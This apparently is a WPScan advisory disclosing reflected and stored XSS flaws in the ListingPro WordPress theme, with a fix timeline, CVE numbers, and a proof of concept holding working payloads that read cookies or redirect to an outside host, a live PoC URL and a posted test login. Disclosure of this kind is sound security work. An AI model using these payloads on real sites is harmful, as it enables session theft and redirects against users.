ListingPro <= 2.0.14.2 - Reflected & Persistent XSS



Description
Reflected & Persistent XSS was discovered in the «ListingPro - WordPress Directory Theme». Current version is 2.0.14.2 (August 9th 2019).

Edit (WPScanTeam):
November 29th, 2019 - Envato Informed
November 29th, 2019 - Envato Investigating
December 4th, 2019 - v2.0.14.3 Released, fixing the reflected XSS but not the stored one. Envato notified again.
December 5th, 2019 - v2.0.14.4 released, stored XSS still present.
December 5th, 2019 - Envato Confirmed Stored XSS still present.
December 12th, 2019 - v2.0.14.5 released, fixing the stored XSS.
Proof of Concept
----[]- Reflected XSS: -[]----
Use your payload inside the «What» input field on the homepage ( https://classic.listingprowp.com/ ) and then submit the form — payload will be triggered.

Payload Sample #0: <!--<img src="--><img src=x onerror=(alert)(document.cookie)//">
Payload Sample #1: "><img src=x onerror=alert(`SUBVΞRSΛ`)>

PoC Link: https://classic.listingprowp.com/?select=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%60SUBV%CE%9ERS%CE%9B%60%29%3E&lp_s_loc=&lp_s_tag=&lp_s_cat=&s=home&post_type=listing


----[]- Persistent XSS: -[]----
You need a new basic user account (register your own or use mine: kadajik5554913/hYWeOJdr5Mqe), then go to the https://classic.listingprowp.com/submit-listing/ page for new listing submit. Choose the «Free» plan and press «Continue» button. On the next page you need to choose any category and after that you'll see the vulnerable input fields: «Best Day/Night» and «Good For» (for some categories you'll see only one vulnerable input field — «Good For»). Use your payload inside vulnerable input field(-s) and save your listing.

Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: "><img src=x onerror=window.location.replace(`http://defcon.su`)>

PoC: log in as kadajik5554913/hYWeOJdr5Mqe (login/password) and go to the https://classic.listingprowp.com/?post_type=listing&p=18417 page.

Affects Theme

fixed in version 2.0.14.5

References

CVE 2019-19540
CVE 2019-19541
CVE 2019-19542
URL https://themeforest.net/item/listingpro-multipurpose-directory-theme/19386460

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher SUBVΞRSΛ
Submitter SUBVΞRSΛ
Views 118123
Verified No
WPVDB ID 9974

Timeline

Publicly Published 2019-11-29 (about 2 months ago)
Added 2019-12-13 (about 1 month ago)
Last Updated 2019-12-27 (26 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin